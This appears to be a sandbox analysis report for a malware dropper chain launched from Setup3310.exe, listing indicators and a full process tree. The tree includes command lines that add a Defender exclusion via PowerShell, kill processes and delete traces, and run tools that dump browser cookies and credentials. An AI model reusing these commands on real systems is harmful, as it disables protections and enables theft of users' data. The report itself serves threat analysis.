HTTP User-Agent header 1352 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 3052 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 3192 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 302 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 928 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1363 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 3656 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 4378 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 4380 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Setup.tmpSetup.exeprolab.tmpZHivecanaepae.exepid process 1452 Setup.tmp 1452 Setup.tmp 3508 Setup.exe 3508 Setup.exe 3508 Setup.exe 3508 Setup.exe 3508 Setup.exe 3508 Setup.exe 3508 Setup.exe 3508 Setup.exe 3304 prolab.tmp 3304 prolab.tmp 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe 2128 ZHivecanaepae.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 2756 -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
setup.exeapp.exepid process 7188 setup.exe 6668 app.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
privacytools5.exeMicrosoftEdgeCP.exepid process 16236 privacytools5.exe 7476 MicrosoftEdgeCP.exe 7476 MicrosoftEdgeCP.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
HGT.exetaskkill.exeZHivecanaepae.exemd7_7dfj.exetaskkill.exeHookSetp.exe5302290.58MultitimerFour.exepowershell.exemultitimer.exeMicrosoftEdge.exemultitimer.exe7za.exeMicrosoftEdgeCP.exedescription pid process Token: SeDebugPrivilege 3484 HGT.exe Token: SeDebugPrivilege 1096 taskkill.exe Token: SeDebugPrivilege 2128 ZHivecanaepae.exe Token: SeManageVolumePrivilege 4488 md7_7dfj.exe Token: SeDebugPrivilege 8044 taskkill.exe Token: SeManageVolumePrivilege 4488 md7_7dfj.exe Token: SeManageVolumePrivilege 4488 md7_7dfj.exe Token: SeDebugPrivilege 15372 HookSetp.exe Token: SeDebugPrivilege 15892 5302290.58 Token: SeDebugPrivilege 16600 MultitimerFour.exe Token: SeDebugPrivilege 16552 powershell.exe Token: SeDebugPrivilege 16948 multitimer.exe Token: SeShutdownPrivilege 2756 Token: SeCreatePagefilePrivilege 2756 Token: SeShutdownPrivilege 2756 Token: SeCreatePagefilePrivilege 2756 Token: SeShutdownPrivilege 2756 Token: SeCreatePagefilePrivilege 2756 Token: SeTakeOwnershipPrivilege 2756 Token: SeRestorePrivilege 2756 Token: SeShutdownPrivilege 2756 Token: SeCreatePagefilePrivilege 2756 Token: SeShutdownPrivilege 2756 Token: SeCreatePagefilePrivilege 2756 Token: SeShutdownPrivilege 2756 Token: SeCreatePagefilePrivilege 2756 Token: SeShutdownPrivilege 2756 Token: SeCreatePagefilePrivilege 2756 Token: SeShutdownPrivilege 2756 Token: SeCreatePagefilePrivilege 2756 Token: SeShutdownPrivilege 2756 Token: SeCreatePagefilePrivilege 2756 Token: SeDebugPrivilege 17456 MicrosoftEdge.exe Token: SeDebugPrivilege 17456 MicrosoftEdge.exe Token: SeDebugPrivilege 17456 MicrosoftEdge.exe Token: SeDebugPrivilege 17456 MicrosoftEdge.exe Token: SeShutdownPrivilege 2756 Token: SeCreatePagefilePrivilege 2756 Token: SeShutdownPrivilege 2756 Token: SeCreatePagefilePrivilege 2756 Token: SeDebugPrivilege 18028 multitimer.exe Token: SeShutdownPrivilege 2756 Token: SeCreatePagefilePrivilege 2756 Token: SeShutdownPrivilege 2756 Token: SeCreatePagefilePrivilege 2756 Token: SeRestorePrivilege 4168 7za.exe Token: 35 4168 7za.exe Token: SeShutdownPrivilege 2756 Token: SeCreatePagefilePrivilege 2756 Token: SeSecurityPrivilege 4168 7za.exe Token: SeShutdownPrivilege 2756 Token: SeCreatePagefilePrivilege 2756 Token: SeShutdownPrivilege 2756 Token: SeCreatePagefilePrivilege 2756 Token: SeDebugPrivilege 18428 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 18428 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 18428 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 18428 MicrosoftEdgeCP.exe Token: SeSecurityPrivilege 4168 7za.exe Token: SeShutdownPrivilege 2756 Token: SeCreatePagefilePrivilege 2756 Token: SeShutdownPrivilege 2756 Token: SeCreatePagefilePrivilege 2756 Token: SeShutdownPrivilege 2756 -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
Setup3310.tmpSetup.tmpDelta.tmpPictureLAb.tmpprolab.tmpSetup3310.tmpv2jb4qjnxkb.tmpvpn.tmpIBInstaller_97039.tmpvict.tmppid process 1568 Setup3310.tmp 1452 Setup.tmp 564 Delta.tmp 3828 PictureLAb.tmp 3304 prolab.tmp 4268 Setup3310.tmp 4276 v2jb4qjnxkb.tmp 4648 vpn.tmp 4768 IBInstaller_97039.tmp 4616 vict.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exepid process 2756 17456 MicrosoftEdge.exe 18200 MicrosoftEdgeCP.exe 18200 MicrosoftEdgeCP.exe 6624 MicrosoftEdge.exe 7476 MicrosoftEdgeCP.exe 7476 MicrosoftEdgeCP.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 2756 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Setup3310.exeSetup3310.tmpSetup.exeSetup.tmpDelta.exeDelta.tmpPictureLAb.exePictureLAb.tmpSetup.exeSetup.tmpHGT.exeprolab.exeSetup.execmd.exeZHivecanaepae.execmd.exegaooo.execmd.exedescription pid process target process PID 756 wrote to memory of 1568 756 Setup3310.exe Setup3310.tmp PID 756 wrote to memory of 1568 756 Setup3310.exe Setup3310.tmp PID 756 wrote to memory of 1568 756 Setup3310.exe Setup3310.tmp PID 1568 wrote to memory of 1816 1568 Setup3310.tmp Setup.exe PID 1568 wrote to memory of 1816 1568 Setup3310.tmp Setup.exe PID 1568 wrote to memory of 1816 1568 Setup3310.tmp Setup.exe PID 1816 wrote to memory of 1452 1816 Setup.exe Setup.tmp PID 1816 wrote to memory of 1452 1816 Setup.exe Setup.tmp PID 1816 wrote to memory of 1452 1816 Setup.exe Setup.tmp PID 1452 wrote to memory of 1940 1452 Setup.tmp Delta.exe PID 1452 wrote to memory of 1940 1452 Setup.tmp Delta.exe PID 1452 wrote to memory of 1940 1452 Setup.tmp Delta.exe PID 1940 wrote to memory of 564 1940 Delta.exe Delta.tmp PID 1940 wrote to memory of 564 1940 Delta.exe Delta.tmp PID 1940 wrote to memory of 564 1940 Delta.exe Delta.tmp PID 564 wrote to memory of 3508 564 Delta.tmp Setup.exe PID 564 wrote to memory of 3508 564 Delta.tmp Setup.exe PID 564 wrote to memory of 3508 564 Delta.tmp Setup.exe PID 1452 wrote to memory of 2736 1452 Setup.tmp PictureLAb.exe PID 1452 wrote to memory of 2736 1452 Setup.tmp PictureLAb.exe PID 1452 wrote to memory of 2736 1452 Setup.tmp PictureLAb.exe PID 2736 wrote to memory of 3828 2736 PictureLAb.exe PictureLAb.tmp PID 2736 wrote to memory of 3828 2736 PictureLAb.exe PictureLAb.tmp PID 2736 wrote to memory of 3828 2736 PictureLAb.exe PictureLAb.tmp PID 3828 wrote to memory of 916 3828 PictureLAb.tmp Setup.exe PID 3828 wrote to memory of 916 3828 PictureLAb.tmp Setup.exe PID 3828 wrote to memory of 916 3828 PictureLAb.tmp Setup.exe PID 916 wrote to memory of 3292 916 Setup.exe Setup.tmp PID 916 wrote to memory of 3292 916 Setup.exe Setup.tmp PID 916 wrote to memory of 3292 916 Setup.exe Setup.tmp PID 3292 wrote to memory of 3484 3292 Setup.tmp HGT.exe PID 3292 wrote to memory of 3484 3292 Setup.tmp HGT.exe PID 3484 wrote to memory of 2192 3484 HGT.exe prolab.exe PID 3484 wrote to memory of 2192 3484 HGT.exe prolab.exe PID 3484 wrote to memory of 2192 3484 HGT.exe prolab.exe PID 2192 wrote to memory of 3304 2192 prolab.exe prolab.tmp PID 2192 wrote to memory of 3304 2192 prolab.exe prolab.tmp PID 2192 wrote to memory of 3304 2192 prolab.exe prolab.tmp PID 3484 wrote to memory of 2128 3484 HGT.exe ZHivecanaepae.exe PID 3484 wrote to memory of 2128 3484 HGT.exe ZHivecanaepae.exe PID 3508 wrote to memory of 2696 3508 Setup.exe cmd.exe PID 3508 wrote to memory of 2696 3508 Setup.exe cmd.exe PID 3508 wrote to memory of 2696 3508 Setup.exe cmd.exe PID 2696 wrote to memory of 1096 2696 cmd.exe taskkill.exe PID 2696 wrote to memory of 1096 2696 cmd.exe taskkill.exe PID 2696 wrote to memory of 1096 2696 cmd.exe taskkill.exe PID 2696 wrote to memory of 3896 2696 cmd.exe timeout.exe PID 2696 wrote to memory of 3896 2696 cmd.exe timeout.exe PID 2696 wrote to memory of 3896 2696 cmd.exe timeout.exe PID 2128 wrote to memory of 11536 2128 ZHivecanaepae.exe cmd.exe PID 2128 wrote to memory of 11536 2128 ZHivecanaepae.exe cmd.exe PID 11536 wrote to memory of 12860 11536 cmd.exe gaooo.exe PID 11536 wrote to memory of 12860 11536 cmd.exe gaooo.exe PID 11536 wrote to memory of 12860 11536 cmd.exe gaooo.exe PID 12860 wrote to memory of 14204 12860 gaooo.exe jfiag3g_gg.exe PID 12860 wrote to memory of 14204 12860 gaooo.exe jfiag3g_gg.exe PID 12860 wrote to memory of 14204 12860 gaooo.exe jfiag3g_gg.exe PID 2128 wrote to memory of 4280 2128 ZHivecanaepae.exe cmd.exe PID 2128 wrote to memory of 4280 2128 ZHivecanaepae.exe cmd.exe PID 4280 wrote to memory of 4488 4280 cmd.exe md7_7dfj.exe PID 4280 wrote to memory of 4488 4280 cmd.exe md7_7dfj.exe PID 4280 wrote to memory of 4488 4280 cmd.exe md7_7dfj.exe PID 12860 wrote to memory of 5404 12860 gaooo.exe jfiag3g_gg.exe PID 12860 wrote to memory of 5404 12860 gaooo.exe jfiag3g_gg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\Setup3310.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:756 -
C:\Users\Admin\AppData\Local\Temp\is-NTBMJ.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-NTBMJ.tmp\Setup3310.tmp" /SL5="$301E6,138429,56832,C:\Users\Admin\AppData\Local\Temp\Setup3310.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1568 -
C:\Users\Admin\AppData\Local\Temp\is-9EAJ1.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-9EAJ1.tmp\Setup.exe" /Verysilent3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1816 -
C:\Users\Admin\AppData\Local\Temp\is-M7FEN.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-M7FEN.tmp\Setup.tmp" /SL5="$201FE,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-9EAJ1.tmp\Setup.exe" /Verysilent4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1452 -
C:\Users\Admin\AppData\Local\Temp\is-IS7LT.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-IS7LT.tmp\Delta.exe" /Verysilent5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Users\Admin\AppData\Local\Temp\is-ATRN2.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-ATRN2.tmp\Delta.tmp" /SL5="$301EA,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-IS7LT.tmp\Delta.exe" /Verysilent6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:564 -
C:\Users\Admin\AppData\Local\Temp\is-MT4A3.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-MT4A3.tmp\Setup.exe" /VERYSILENT7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3508 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-MT4A3.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit8⤵
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1096 -
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
PID:3896 -
C:\Users\Admin\AppData\Local\Temp\is-IS7LT.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-IS7LT.tmp\PictureLAb.exe" /Verysilent5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Users\Admin\AppData\Local\Temp\is-LPFA4.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-LPFA4.tmp\PictureLAb.tmp" /SL5="$401EA,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-IS7LT.tmp\PictureLAb.exe" /Verysilent6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3828 -
C:\Users\Admin\AppData\Local\Temp\is-U97SA.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-U97SA.tmp\Setup.exe" /VERYSILENT7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:916 -
C:\Users\Admin\AppData\Local\Temp\is-UTASO.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-UTASO.tmp\Setup.tmp" /SL5="$D01D6,298214,214528,C:\Users\Admin\AppData\Local\Temp\is-U97SA.tmp\Setup.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3292 -
C:\Users\Admin\AppData\Local\Temp\is-PUJBI.tmp\HGT.exe"C:\Users\Admin\AppData\Local\Temp\is-PUJBI.tmp\HGT.exe" /S /UID=lab2149⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3484 -
C:\Program Files\Windows Portable Devices\NXMJWTVHDM\prolab.exe"C:\Program Files\Windows Portable Devices\NXMJWTVHDM\prolab.exe" /VERYSILENT10⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2192 -
C:\Users\Admin\AppData\Local\Temp\is-T4AL2.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-T4AL2.tmp\prolab.tmp" /SL5="$50080,575243,216576,C:\Program Files\Windows Portable Devices\NXMJWTVHDM\prolab.exe" /VERYSILENT11⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:3304 -
C:\Users\Admin\AppData\Local\Temp\fe-89ab2-437-f7b97-0fc94de710fa4\ZHivecanaepae.exe"C:\Users\Admin\AppData\Local\Temp\fe-89ab2-437-f7b97-0fc94de710fa4\ZHivecanaepae.exe"10⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nyqo1bh3.0wh\gaooo.exe & exit11⤵
- Suspicious use of WriteProcessMemory
PID:11536 -
C:\Users\Admin\AppData\Local\Temp\nyqo1bh3.0wh\gaooo.exeC:\Users\Admin\AppData\Local\Temp\nyqo1bh3.0wh\gaooo.exe12⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:12860 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
- Executes dropped EXE
PID:14204 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
- Executes dropped EXE
PID:5404 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:3220
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3c5t3gle.vzy\md7_7dfj.exe & exit11⤵
- Suspicious use of WriteProcessMemory
PID:4280 -
C:\Users\Admin\AppData\Local\Temp\3c5t3gle.vzy\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\3c5t3gle.vzy\md7_7dfj.exe12⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:4488 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l34zcknv.bck\askinstall29.exe & exit11⤵PID:5832
-
C:\Users\Admin\AppData\Local\Temp\l34zcknv.bck\askinstall29.exeC:\Users\Admin\AppData\Local\Temp\l34zcknv.bck\askinstall29.exe12⤵
- Executes dropped EXE
- Modifies system certificate store
PID:6116 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe13⤵PID:7880
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe14⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8044 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r3zj4blo.z4s\customer4.exe & exit11⤵PID:14516
-
C:\Users\Admin\AppData\Local\Temp\r3zj4blo.z4s\customer4.exeC:\Users\Admin\AppData\Local\Temp\r3zj4blo.z4s\customer4.exe12⤵
- Executes dropped EXE
PID:14640 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"13⤵
- Executes dropped EXE
- Loads dropped DLL
PID:14868 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exeparse.exe -f json -b firefox14⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:18284 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exeparse.exe -f json -b chrome14⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:18296 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exeparse.exe -f json -b edge14⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:18324 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oqeqxrmt.bzu\HookSetp.exe & exit11⤵PID:15284
-
C:\Users\Admin\AppData\Local\Temp\oqeqxrmt.bzu\HookSetp.exeC:\Users\Admin\AppData\Local\Temp\oqeqxrmt.bzu\HookSetp.exe12⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:15372 -
C:\ProgramData\5302290.58"C:\ProgramData\5302290.58"13⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:15892 -
C:\ProgramData\4017391.44"C:\ProgramData\4017391.44"13⤵
- Executes dropped EXE
- Adds Run key to start application
PID:15928 -
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"14⤵
- Executes dropped EXE
PID:16164 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jhl3h3sf.3xj\GcleanerWW.exe /mixone & exit11⤵PID:15560
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\24ianbxp.dqg\privacytools5.exe & exit11⤵PID:15660
-
C:\Users\Admin\AppData\Local\Temp\24ianbxp.dqg\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\24ianbxp.dqg\privacytools5.exe12⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:15748 -
C:\Users\Admin\AppData\Local\Temp\24ianbxp.dqg\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\24ianbxp.dqg\privacytools5.exe13⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:16236 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\csoc0qir.1tf\setup.exe /8-2222 & exit11⤵PID:16324
-
C:\Users\Admin\AppData\Local\Temp\csoc0qir.1tf\setup.exeC:\Users\Admin\AppData\Local\Temp\csoc0qir.1tf\setup.exe /8-222212⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:16448 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Still-Dream"13⤵
- Suspicious use of AdjustPrivilegeToken
PID:16552 -
C:\Program Files (x86)\Still-Dream\7za.exe"C:\Program Files (x86)\Still-Dream\7za.exe" e -p154.61.71.51 winamp-plugins.7z13⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:4168 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Still-Dream\setup.exe" -map "C:\Program Files (x86)\Still-Dream\WinmonProcessMonitor.sys""13⤵PID:7052
-
C:\Program Files (x86)\Still-Dream\setup.exe"C:\Program Files (x86)\Still-Dream\setup.exe" -map "C:\Program Files (x86)\Still-Dream\WinmonProcessMonitor.sys"14⤵
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
PID:7188 -
C:\Program Files (x86)\Still-Dream\7za.exe"C:\Program Files (x86)\Still-Dream\7za.exe" e -p154.61.71.51 winamp.7z13⤵PID:7444
-
C:\Program Files (x86)\Still-Dream\setup.exe"C:\Program Files (x86)\Still-Dream\setup.exe" /8-222213⤵PID:7564
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hcyicp3d.hsj\MultitimerFour.exe & exit11⤵PID:16464
-
C:\Users\Admin\AppData\Local\Temp\hcyicp3d.hsj\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\hcyicp3d.hsj\MultitimerFour.exe12⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:16600 -
C:\Users\Admin\AppData\Local\Temp\B4AFZH03CW\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\B4AFZH03CW\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10413⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:16948 -
C:\Users\Admin\AppData\Local\Temp\B4AFZH03CW\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\B4AFZH03CW\multitimer.exe" 1 3.1616083582.60537a7e59a7f 10414⤵
- Executes dropped EXE
- Adds Run key to start application
PID:17896 -
C:\Users\Admin\AppData\Local\Temp\B4AFZH03CW\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\B4AFZH03CW\multitimer.exe" 2 3.1616083582.60537a7e59a7f15⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:18028 -
C:\Users\Admin\AppData\Local\Temp\ithjzmyjyj0\1mirsv0ngwj.exe"C:\Users\Admin\AppData\Local\Temp\ithjzmyjyj0\1mirsv0ngwj.exe" /ustwo INSTALL16⤵
- Executes dropped EXE
PID:1788 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 64817⤵
- Drops file in Windows directory
- Program crash
PID:6488 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 66017⤵
- Program crash
PID:6704 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 76417⤵
- Program crash
PID:6920 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 80017⤵
- Program crash
PID:6988 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 88017⤵
- Program crash
PID:7112 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 94417⤵
- Program crash
PID:7748 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 108417⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:5276 -
C:\Users\Admin\AppData\Local\Temp\o3kg01b4dda\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\o3kg01b4dda\Setup3310.exe" /Verysilent /subid=57716⤵
- Executes dropped EXE
PID:4368 -
C:\Users\Admin\AppData\Local\Temp\is-DNDFO.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-DNDFO.tmp\Setup3310.tmp" /SL5="$901DE,138429,56832,C:\Users\Admin\AppData\Local\Temp\o3kg01b4dda\Setup3310.exe" /Verysilent /subid=57717⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4268 -
C:\Users\Admin\AppData\Local\Temp\is-L7PA0.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-L7PA0.tmp\Setup.exe" /Verysilent18⤵
- Executes dropped EXE
